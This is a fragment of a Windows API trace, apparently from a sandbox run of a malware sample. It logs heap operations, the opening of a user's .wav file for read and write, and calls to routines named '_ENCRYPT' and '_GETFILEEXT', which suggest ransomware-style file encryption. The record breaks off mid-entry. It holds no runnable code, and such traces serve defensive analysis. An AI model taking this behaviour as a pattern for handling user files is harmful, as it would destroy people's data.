(lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\E6Du.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\y6ubt-qdhh8vkxog3x\\e6du.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0038.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0038.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0038.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0038.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0038.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0038.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0038.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0038.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0038.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0038.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0038.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0038.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0038.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0038.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0038.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xaa0008, cbMultiByte=64, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0038.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0038.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xaa0008, cbMultiByte=64, lpWideCharStr=0x7d5c40, cchWideChar=64 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\E6Du.wav") returned 64 [0038.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0038.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0038.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0038.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0038.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0038.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0038.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0038.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0038.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0038.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0038.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0038.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0038.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0038.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0038.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0038.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0038.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0038.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0038.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0038.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0038.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0038.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0038.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0038.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0038.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0038.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0038.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0038.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0038.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0038.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0038.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0038.764] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0038.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0038.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0038.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0038.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0038.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0038.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0038.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0038.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0038.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0038.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0038.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0038.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0038.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0038.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0038.765] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0038.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0038.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0038.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0038.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0038.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0038.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0038.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0038.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0038.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0038.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0038.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0038.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0038.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0038.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0038.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0038.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0038.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0038.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0038.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0038.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0038.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0038.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0038.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0038.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0038.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0038.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0038.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0038.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0038.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0038.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0038.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0038.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0038.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0038.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0038.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0038.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0038.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0038.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0038.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0038.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0038.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0038.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.766] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0038.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0038.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0038.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0038.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0038.766] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0038.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0038.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0038.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0038.767] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0038.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0038.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0038.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0038.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0038.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0038.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0038.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0038.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0038.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0038.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0038.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0038.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0038.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0038.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0038.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0038.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0038.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0038.767] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0038.767] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0038.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0038.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0038.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0038.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0038.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0038.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0038.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0038.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0038.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0038.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0038.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0038.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0038.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0038.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0038.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0038.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0038.768] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0038.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0038.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0038.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889b08 [0038.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x889b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0038.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0038.768] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0038.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0038.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0038.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0038.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0038.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0038.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0038.769] CloseHandle (hObject=0x128) returned 1 [0038.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0038.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0038.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0038.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0038.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0038.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0038.769] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0038.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0038.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0038.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0038.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0038.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0038.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0038.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0038.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0038.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0038.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0038.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0038.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0038.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0038.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0038.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0038.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0038.770] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0038.770] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0038.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0038.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0038.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0038.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0038.770] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0038.770] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0038.770] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.770] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0038.770] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0038.770] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.770] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.770] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.770] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0038.770] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.770] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.770] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.770] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\E6Du.wav", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5605b140, ftCreationTime.dwHighDateTime=0x1d5bb02, ftLastAccessTime.dwLowDateTime=0x44983720, ftLastAccessTime.dwHighDateTime=0x1d5c084, ftLastWriteTime.dwLowDateTime=0x44983720, ftLastWriteTime.dwHighDateTime=0x1d5c084, nFileSizeHigh=0x0, nFileSizeLow=0x160cd, dwReserved0=0x0, dwReserved1=0x777648, cFileName="E6Du.wav", cAlternateFileName="")) returned 0x7c20c0 [0038.770] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0038.771] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.771] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\y6uBt-QDHh8VkXOg3X\\E6Du.wav", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5605b140, ftCreationTime.dwHighDateTime=0x1d5bb02, 